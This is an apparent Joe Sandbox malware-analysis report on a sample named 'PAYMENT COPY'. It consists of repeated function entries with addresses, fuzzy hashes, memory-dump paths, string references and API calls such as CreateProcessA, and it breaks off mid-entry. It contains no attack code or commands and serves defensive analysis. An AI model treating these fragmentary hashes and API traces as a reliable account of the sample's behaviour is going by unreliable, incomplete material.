Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ef1758f2d1cb2d5a256c78526a6ef5d60567188bf08d149e43305b5dd4ceec
Instruction ID: 2e65bf5bf8c9aca503447f51792f0bd80f4401e717e946fd9e58f969fceb0c7f
Opcode Fuzzy Hash: 88ef1758f2d1cb2d5a256c78526a6ef5d60567188bf08d149e43305b5dd4ceec
Instruction Fuzzy Hash: 28900222641400435151716888449065045BBE2221B59C921A0998950DC69989655765

Function 01502FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b09d8f7399deb19b6626bb2c881768cb0c6a97c7404bfa1e3e5aecfb80e7983
Instruction ID: 9a93a6cb67494360b7b7d038bd39d7f84989dff381d226c80e292e409802ba93
Opcode Fuzzy Hash: 1b09d8f7399deb19b6626bb2c881768cb0c6a97c7404bfa1e3e5aecfb80e7983
Instruction Fuzzy Hash: 4490023224180403E111715848087471045A7D1312F59C811A5164955EC7A5C9916631

Function 01502E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a09d56ba6659ac57c14b55ac9408fb46d1627d0470e4518487b744796b7edb95
Instruction ID: e734b6764ac39eab09e5526665140eab252740108de328858354fc9514e70663
Opcode Fuzzy Hash: a09d56ba6659ac57c14b55ac9408fb46d1627d0470e4518487b744796b7edb95
Instruction Fuzzy Hash: 6E90022234140403E113715844146061049E7D2355F99C812E1424955DC7658A53A232

Function 01502EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dfc0d07ea010063b055d4f86db50f649ec7ba3e961ef4c31c442855c9d5b258
Instruction ID: 19cb9680697bcf06f59fe7e9913116cec5006c4cc5398504900ad9dafaf07c93
Opcode Fuzzy Hash: 1dfc0d07ea010063b055d4f86db50f649ec7ba3e961ef4c31c442855c9d5b258
Instruction Fuzzy Hash: 4B90026224180403E151755848046071045A7D1312F59C811A2064955ECB698D516235

Function 01502E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ce6dd23c0bf750b2dcee577f4907781e0df5833c3b2bda3791d5492a1f7240
Instruction ID: c85c2b594452267390fa5b5836dbc60ab48df1d874bff21d947f428657a83259
Opcode Fuzzy Hash: f7ce6dd23c0bf750b2dcee577f4907781e0df5833c3b2bda3791d5492a1f7240
Instruction Fuzzy Hash: FE90022264140503E11271584404616104AA7D1251F99C822A1024955ECB658A92A231

Function 01502EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4c7a9d81c81531727802ba8e80cb2d2c703ffc29e35426eca9a4ad5bb09a79d
Instruction ID: a89b6111584f4d9299371caa47fdac24fb21337486f857fd890625fecea7cf16
Opcode Fuzzy Hash: b4c7a9d81c81531727802ba8e80cb2d2c703ffc29e35426eca9a4ad5bb09a79d
Instruction Fuzzy Hash: 4890027224140403E151715844047461045A7D1311F59C811A5064954EC7998ED56765

Function 01503010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a99c26014715e639a32f574574c63149f9e07c14b4245b428295e24d7c55ae1
Instruction ID: 15fb1a9fc048a80b99e70ee4e5c50fed44f4e1eca163f17bf1199bedd0557824
Opcode Fuzzy Hash: 7a99c26014715e639a32f574574c63149f9e07c14b4245b428295e24d7c55ae1
Instruction Fuzzy Hash: 2790022224184443E15172584804B0F5145A7E2212F99C819A4156954CCA5589555721

Function 01503090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97c2200e01c9a057eba2b8a07534fe60d60dbca2b6c5055e25e3ce3238dc0bef
Instruction ID: 55634c67026ea30c4588adc4414eeec80b904b1e7543d3928024363784e72745
Opcode Fuzzy Hash: 97c2200e01c9a057eba2b8a07534fe60d60dbca2b6c5055e25e3ce3238dc0bef
Instruction Fuzzy Hash: 5A90022228140803E151715884147071046E7D1611F59C811A0024954DC7568A6567B1

Function 015039B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec51e3a676bae3e553ad36086b05bc7516155fc911d21af1ccb8414caf86f5b7
Instruction ID: 5b2c0a571341884ce731e7bba821cc5d4e448bb842b2f0bd8f3ba2153fc6fa06
Opcode Fuzzy Hash: ec51e3a676bae3e553ad36086b05bc7516155fc911d21af1ccb8414caf86f5b7
Instruction Fuzzy Hash: EE90022228545103E161715C44046165045B7E1211F59C821A0814994DC69589556321

Function 01503D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5768e7f966ba06cdb6d45509e0ba376024acf478eb265f421a533d8e4c5623e
Instruction ID: 7993835e0dd2b194028641aa56c777ada7223e11c2dbdf20c2680a750772b8b3
Opcode Fuzzy Hash: b5768e7f966ba06cdb6d45509e0ba376024acf478eb265f421a533d8e4c5623e
Instruction Fuzzy Hash: AA90023624140403E521715858046461086A7D1311F59DC11A0424958DC79489A1A221

Function 01503D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30cf1f795e0c7bda2956d4b7e76430caa51c19aa475c93f1aaf2f686a0a64df
Instruction ID: 0b15b1007f873c06043334bb8be42a19f1d5d20ac9be9b343a539c87d1702cc4
Opcode Fuzzy Hash: d30cf1f795e0c7bda2956d4b7e76430caa51c19aa475c93f1aaf2f686a0a64df
Instruction Fuzzy Hash: 6090023224240143A55172585804A4E5145A7E2312F99DC15A0015954CCA5489615321

Function 01502C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 889ee73ce7e56ae7420f135c2d0176bbb1f3d1f47872cde6f736a0e4a772e6a1
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 01502890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0150293C
___swprintf_l.LIBCMT ref: 0150295E
___swprintf_l.LIBCMT ref: 015029A3
___swprintf_l.LIBCMT ref: 0153A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0153A527
:%u.%u.%u.%u, xrefs: 0153A5B8
ffff:, xrefs: 0153A504
::ffff:0:%u.%u.%u.%u, xrefs: 0153A54E

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 57d263cd988dbf31153f3a2b301b9abd976da9d4ac9febdd7f43408763d4f9cf
Instruction ID: 87c43435daf2d2cddb78b8c6302e407564e26de4672fa612a8844a8be2819d3e
Opcode Fuzzy Hash: 57d263cd988dbf31153f3a2b301b9abd976da9d4ac9febdd7f43408763d4f9cf
Instruction Fuzzy Hash: CC51E7B5A00216BFDF12DF9C888497EFBB8BB48240B50856AF595DB681D334DE4087A0

Function 01572410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 015724A6
___swprintf_l.LIBCMT ref: 015724E2
___swprintf_l.LIBCMT ref: 0157257D
___swprintf_l.LIBCMT ref: 015725A3
___swprintf_l.LIBCMT ref: 015725C8
___swprintf_l.LIBCMT ref: 01572608

Strings

::%hs%u.%u.%u.%u, xrefs: 0157249E
::ffff:0:%u.%u.%u.%u, xrefs: 015724DA
:%u.%u.%u.%u, xrefs: 015725FF
ffff:, xrefs: 0157247D, 0157249D

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d972de9552710ccdbf90bac2948d10db8015f00412d26a4f0f363df096c4d2a1
Instruction ID: 28ff908f17f9ab197f56593d3315c124ff904ff3614003348120ae43704804d2
Opcode Fuzzy Hash: d972de9552710ccdbf90bac2948d10db8015f00412d26a4f0f363df096c4d2a1
Instruction Fuzzy Hash: 94510671A00646AEDB31DF5DD89197FBBF9FB44200F14885AF496CF681E674EA408760

Function 014F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01534742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01534725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015346FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01534655
CLIENT(ntdll): Processing section info %ws..., xrefs: 01534787
Execute=1, xrefs: 01534713
ExecuteOptions, xrefs: 015346A0

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6bcb95e63858da480d3370b38802e54d5aba63581e648d1755ca652d725f9f53
Instruction ID: 60a37e4aec9290f5feffb8e457e33c70195dfb0bf9fc64c682a09791b0979a7d
Opcode Fuzzy Hash: 6bcb95e63858da480d3370b38802e54d5aba63581e648d1755ca652d725f9f53
Instruction Fuzzy Hash: AE516B3160021A7BEF11ABA8DC85FAE77A8FF58311F04009ED709AB3E1D774AA418F50

Function 01596940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 656e41ebfdb083983b50d28f42c6bd578920d53436209b6be900b12f921011a5
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: EE020271508342AFDB05CF18C990A6FBBE5FFC8704F04892DB9999B264DB31E909CB52

Function 0150B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0150B6BF

Strings

-, xrefs: 0150B650
0, xrefs: 0150B66F
0, xrefs: 0150B695
+, xrefs: 0150B65A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 334fe83910928d6cf5ad61de890243589b73202e95aae8f7d7a59f337ccca8d1
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: B181A178E0524A9EEF2A8EECC8D17BEBBB1BF85310F184659D851AF2D1C73499408B51

Function 015720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0157214F
___swprintf_l.LIBCMT ref: 01572172

Strings

]:%u, xrefs: 01572169
%%%u, xrefs: 01572146
[, xrefs: 0157212B

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 0a0c5dacdd6b6d4b907f20c5610e46d0ee070395ad42130ef379904313cb6695
Instruction ID: 7cf2d6908a08dfaafc311a12ee73acafc895574572fadcf2ff0f827560509cc8
Opcode Fuzzy Hash: 0a0c5dacdd6b6d4b907f20c5610e46d0ee070395ad42130ef379904313cb6695
Instruction Fuzzy Hash: 1A21777AE0015AABDB11DF79EC45AFE7BF8FF54650F440116E945D7240E730DA018BA1

Function 014EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015302BD
RTL: Re-Waiting, xrefs: 0153031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015302E7

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 72e13f2fca4ea2d4cfa59237e8c8b335e0122585ad62d0d86c00a4828f17fa51
Instruction ID: 8cde6061a7a5cedf9eecb6b1350da4004bdcfcbf1aafa0841cebe60853103372
Opcode Fuzzy Hash: 72e13f2fca4ea2d4cfa59237e8c8b335e0122585ad62d0d86c00a4828f17fa51
Instruction Fuzzy Hash: 8FE19F706087429FE725CF28C888B2ABBE0BF84315F144A5EF5A5CB2E1D774D949CB52

Function 014FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01537B7F
RTL: Re-Waiting, xrefs: 01537BAC
RTL: Resource at %p, xrefs: 01537B8E

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 615bf301befa89942cdecaab2b12b756cf4ea90cd0f09903b4aba89f499093f3
Instruction ID: f3186b15b3639f91dc1f4ebf81e4ee43efd88b648f1fbdcbc34f414585162243
Opcode Fuzzy Hash: 615bf301befa89942cdecaab2b12b756cf4ea90cd0f09903b4aba89f499093f3
Instruction Fuzzy Hash: CD41E0357047038BD725CE29CC50B6BB7E5FB99720F100A1EEA56DB390EB71E4058B91

Function 014FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0153728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01537294
RTL: Re-Waiting, xrefs: 015372C1
RTL: Resource at %p, xrefs: 015372A3

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: b51002da45935eeaca7f713cbc5959e34bcbba8734991b7e8c38e5a29234cbfa
Instruction ID: ffd2f9eaa1ea7b434c8b91206e5a6c13e0571422f175dcf4879166f205afce46
Opcode Fuzzy Hash: b51002da45935eeaca7f713cbc5959e34bcbba8734991b7e8c38e5a29234cbfa
Instruction Fuzzy Hash: 6041EF71B00203ABD721CE29CD41F6AB7A5FB99714F10062EFA55AB390DB30F8528BD1

Function 01572300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0157238D
___swprintf_l.LIBCMT ref: 015723B3

Strings

%%%u, xrefs: 01572384
]:%u, xrefs: 015723AA

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 521f5792b0a08c239c478b1a1e0e31c831e57d06688c6fcac13926d9685c08a8
Instruction ID: d170f31d320889194b18de4c7cb270ac6eab0ff8c46947abdc564c9e41cec5dc
Opcode Fuzzy Hash: 521f5792b0a08c239c478b1a1e0e31c831e57d06688c6fcac13926d9685c08a8
Instruction Fuzzy Hash: 12317372A002199FDB21DF2DDC41BEEB7F8FF54610F55455AE949E7240EB30EA448BA0

Function 01507D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01507E8B

Strings

+, xrefs: 01507DE8
-, xrefs: 01507DDD

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 6d66f495753db6c7517da0a1462ee779aabad5edf07b2f9b9c571a2a56f1e59b
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: A0919471E002169FDB26DFEDC891ABEBBA5BF48320F14451EE9A5AF2C0D730AD418751

Function 014C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 014C9191
@, xrefs: 014C9175

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1d1e424058aa2be34acb3fab0089622776e77cd40c8a6cde1400d1ae54e212ec
Instruction ID: 41dd9fc8cfb01e9e109066b8c90629ce59e93c5a1bf648ceb04c49bc5840b1b4
Opcode Fuzzy Hash: 1d1e424058aa2be34acb3fab0089622776e77cd40c8a6cde1400d1ae54e212ec
Instruction Fuzzy Hash: B2812B76D002699BDB71CB54CC45BEEBAB4BB49714F0441DAEA19BB290D7309E84CFA0

Function 0154CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0154CFBD

Strings

@, xrefs: 0154CF0A
@4Dw@4Dw, xrefs: 0154CFD5, 0154CFDA, 0154CFF1

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Dw@4Dw
API String ID: 4062629308-3936743583
Opcode ID: da023b12adc9f9b7c62fa7bcfddb9954783ed6d73e7de9549639710ed268558b
Instruction ID: 9038ee1df6988b04883a864bd315f1c42b7ae5886b0dbe87da61590b04fbfc8d
Opcode Fuzzy Hash: da023b12adc9f9b7c62fa7bcfddb9954783ed6d73e7de9549639710ed268558b
Instruction Fuzzy Hash: 7941AD71900215DFDB21DFAAC880AADBBF8FFA4B44F00442EE915EF264E7348801DB65

Analysis Process: bQrgcvrrXfGN.exePID: 3472, Parent PID: 1048COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	306
Total number of Limit Nodes:	14

Executed Functions

Function 0113CF70 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0113CFFE
GetCurrentThread.KERNEL32 ref: 0113D03B
GetCurrentProcess.KERNEL32 ref: 0113D078
GetCurrentThreadId.KERNEL32 ref: 0113D0D1

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c34259d7870f8f2630200e56ef68dc4b0608a6bbaae5efcb5eda7ea39c6f5b75
Instruction ID: 3defc022e7d15ed223058310b952236d5ee4235d0396e0e404d0a29e82536b81
Opcode Fuzzy Hash: c34259d7870f8f2630200e56ef68dc4b0608a6bbaae5efcb5eda7ea39c6f5b75
Instruction Fuzzy Hash: E05155B0900609CFDB58CFAAD548BAEBBF1AF88300F24C55AD519A72A0D7346985CF65

Function 0113CF78 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0113CFFE
GetCurrentThread.KERNEL32 ref: 0113D03B
GetCurrentProcess.KERNEL32 ref: 0113D078
GetCurrentThreadId.KERNEL32 ref: 0113D0D1

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2fc92ead89b3415f8aad8953aea799db20b63e597c362387d147bfba3d056cce
Instruction ID: f9cffea2732b2b7bf488d42aa3db758a2281aaede19dc0009152913ed7afe639
Opcode Fuzzy Hash: 2fc92ead89b3415f8aad8953aea799db20b63e597c362387d147bfba3d056cce
Instruction Fuzzy Hash: F15164B0900609CFDB58CFAAD548BAEBBF1EF88300F24C55AD509A72A0D7346985CF65

Function 0113CF80 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0113CFFE
GetCurrentThread.KERNEL32 ref: 0113D03B
GetCurrentProcess.KERNEL32 ref: 0113D078
GetCurrentThreadId.KERNEL32 ref: 0113D0D1

Memory Dump Source

Source File: 0000000A.00000002.2582115660.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1130000_bQrgcvrrXfGN.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bb2ef66e18462f2e961c0ccb57cd2a157a64ee1e295abba93ed2a60ea75fa98e
Instruction ID: ebf215264ccab0d82e80e6c42a385f53ab2bab96dacc20549008b4984f9edad6
Opcode Fuzzy Hash: bb2ef66e18462f2e961c0ccb57cd2a157a64ee1e295abba93ed2a60ea75fa98e
Instruction Fuzzy Hash: A25163B0900609CFDB18DFAAD548BAEBBF1EF88300F24C559D509A72A0D734A985CB65

Function 070763EC Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0707662E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 12ea2a51429fef198f49367e89d342e8064c0a2867328e06730890ae6c0e84bc
Instruction ID: 59ac94e0d2271b6057b474b23a0a4fee57a2a470a8573872a5f585392e477983
Opcode Fuzzy Hash: 12ea2a51429fef198f49367e89d342e8064c0a2867328e06730890ae6c0e84bc
Instruction Fuzzy Hash: DAA16AB1D0061ACFEB14CF68C841BEDBBF2BF48314F148669E809A7244D7759985CF95

Function 070763F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0707662E

Memory Dump Source

Source File: 0000000A.00000002.2587195103.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7070000_bQrgcvrrXfGN.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 89ac43007de4c43c6aee1b1f2f374c3b810d27394468b971d41028bdffe44f2e
Instruction ID: f689c1184744bead98291231f45787b16f14ecb72c535efbc69ceac600030bc4
Opcode Fuzzy Hash: 89ac43007de4c43c6aee1b1f2f374c3b810d27394468b971d41028bdffe44f2e
